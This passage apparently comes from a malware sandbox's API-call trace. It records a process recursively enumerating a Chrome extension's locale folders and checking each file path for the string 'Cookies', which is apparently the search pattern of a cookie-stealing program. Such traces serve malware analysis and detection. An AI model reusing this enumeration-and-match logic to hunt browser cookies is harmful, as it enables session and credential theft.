lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0163.231] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.231] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.231] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bc4d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xe0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0163.231] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs") returned 137 [0163.231] lstrlenW (lpString="\\") returned 1 [0163.231] GetProcessHeap () returned 0x8e0000 [0163.231] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x116) returned 0x9174c8 [0163.231] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs" [0163.231] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\" [0163.231] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\") returned 138 [0163.231] lstrlenW (lpString="messages.json") returned 13 [0163.231] GetProcessHeap () returned 0x8e0000 [0163.231] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x130) returned 0x9175e8 [0163.231] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\" [0163.231] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json" [0163.231] VirtualQuery (in: lpAddress=0x9174c8, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x917000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x10000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.231] GetProcessHeap () returned 0x8e0000 [0163.231] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9174c8 | out: hHeap=0x8e0000) returned 1 [0163.231] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json", lpSrch="Cookies") returned 0x0 [0163.273] VirtualQuery (in: lpAddress=0x9175e8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x917000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x10000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.273] GetProcessHeap () returned 0x8e0000 [0163.273] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9175e8 | out: hHeap=0x8e0000) returned 1 [0163.273] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bc4d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xe0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0163.273] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0163.273] VirtualQuery (in: lpAddress=0x9173a0, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x917000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x10000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.273] GetProcessHeap () returned 0x8e0000 [0163.273] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9173a0 | out: hHeap=0x8e0000) returned 1 [0163.273] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.273] GetProcessHeap () returned 0x8e0000 [0163.273] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0163.273] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="da", cAlternateFileName="")) returned 1 [0163.273] lstrcmpiW (lpString1="da", lpString2=".") returned 1 [0163.273] lstrcmpiW (lpString1="da", lpString2="..") returned 1 [0163.273] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.273] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.273] lstrlenW (lpString="\\") returned 1 [0163.273] GetProcessHeap () returned 0x8e0000 [0163.273] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0163.273] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0163.273] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0163.273] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0163.273] lstrlenW (lpString="da") returned 2 [0163.273] GetProcessHeap () returned 0x8e0000 [0163.273] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x114) returned 0x925dd8 [0163.273] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0163.273] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="da" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da" [0163.273] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.274] GetProcessHeap () returned 0x8e0000 [0163.274] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0163.274] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da") returned 137 [0163.274] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da") returned 137 [0163.274] lstrlenW (lpString="\\*.*") returned 4 [0163.274] GetProcessHeap () returned 0x8e0000 [0163.274] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x9173a0 [0163.274] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da" [0163.274] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\*.*" [0163.274] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0163.274] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.274] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0163.274] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.274] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.274] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bc4d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xe0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0163.274] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da") returned 137 [0163.274] lstrlenW (lpString="\\") returned 1 [0163.274] GetProcessHeap () returned 0x8e0000 [0163.274] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x116) returned 0x9174c8 [0163.274] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da" [0163.274] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\" [0163.274] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\") returned 138 [0163.274] lstrlenW (lpString="messages.json") returned 13 [0163.274] GetProcessHeap () returned 0x8e0000 [0163.274] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x130) returned 0x9175e8 [0163.275] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\" [0163.275] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json" [0163.275] VirtualQuery (in: lpAddress=0x9174c8, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x917000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x10000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.275] GetProcessHeap () returned 0x8e0000 [0163.275] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9174c8 | out: hHeap=0x8e0000) returned 1 [0163.275] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json", lpSrch="Cookies") returned 0x0 [0163.275] VirtualQuery (in: lpAddress=0x9175e8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x917000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x10000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.275] GetProcessHeap () returned 0x8e0000 [0163.275] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9175e8 | out: hHeap=0x8e0000) returned 1 [0163.275] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bc4d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xe0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0163.275] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0163.275] VirtualQuery (in: lpAddress=0x9173a0, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x917000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x10000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.275] GetProcessHeap () returned 0x8e0000 [0163.275] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9173a0 | out: hHeap=0x8e0000) returned 1 [0163.275] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.275] GetProcessHeap () returned 0x8e0000 [0163.275] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0163.275] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="de", cAlternateFileName="")) returned 1 [0163.275] lstrcmpiW (lpString1="de", lpString2=".") returned 1 [0163.275] lstrcmpiW (lpString1="de", lpString2="..") returned 1 [0163.275] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.275] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.275] lstrlenW (lpString="\\") returned 1 [0163.275] GetProcessHeap () returned 0x8e0000 [0163.275] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0163.275] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0163.275] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0163.275] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0163.275] lstrlenW (lpString="de") returned 2 [0163.275] GetProcessHeap () returned 0x8e0000 [0163.276] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x114) returned 0x925dd8 [0163.276] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0163.276] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="de" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de" [0163.276] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.276] GetProcessHeap () returned 0x8e0000 [0163.276] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0163.276] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de") returned 137 [0163.276] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de") returned 137 [0163.276] lstrlenW (lpString="\\*.*") returned 4 [0163.276] GetProcessHeap () returned 0x8e0000 [0163.276] 